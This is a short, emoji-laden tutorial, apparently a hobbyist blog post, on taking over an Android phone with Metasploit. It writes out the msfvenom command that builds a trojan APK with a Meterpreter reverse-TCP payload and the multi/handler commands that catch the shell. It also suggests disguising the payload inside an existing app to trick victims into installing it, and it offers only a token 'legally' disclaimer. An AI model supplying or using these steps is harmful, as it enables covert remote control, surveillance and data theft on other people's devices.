H4ck Android using METASPLOIT π±βπ»
HACK THE WORLD π LEGALLY OF COURSE π©ββοΈ
I assume you have a decent linux distro for hacking
or at least Metasploit π±βπ»
- Attacker and victim must be on same network
- Victim should download the apk file
If everything is ready lets rock n roll π
We will generate a PAYLOAD apk that will make a METERPRETER REVERSE SHELL to attackers computer
We are using basic Msfvenom payload
you could poison an existing mobile app to trick victim
- generate a apk payload
- start a listener
- victim download and execute it
- boom we are done π₯
Generating payload is pretty easy task using Msfvenom π€
Make sure you have msfvenom by typing
msfvenom -h
in your terminalif it is ready you are good to go
LHOST = Your IP address [ type ifconfig
in your terminal ]
LPORT = Any port [ eg: 4444, 5555, 6666 etc .. ]
msfvenom -p android/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=<ANY_PORT> R > payload.apk
In the above command we are using android/meterpreter/reverse_tcp
as our payload, because Meterpreter provides us lots of command, which makes hacking so easy
Listener should be running when victim install the app
Fire up METASPLOIT π±βπ»
use exploit/multi/handler
msf6 > use exploit/multi/handler
fill up the options, you can see all options by typing show options
we need to set LHOST
LPORT
& PAYLOAD
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST <IP_USED_ON_PAYLOAD>
set LPORT <PORT_USED_ON_PAYLOAD>
run the exploit
run
Now listener will start, wait until victim install the app π¨βπ»
If victim install the app, you should get a Meterpreter shell back CONGRATULATIONS, YOU HACKED IN TO AN ANDROID DEVICE π
If you found this post boring here is the video explanation
βDO NOT USE THIS FOR ILLEGAL STUFFβ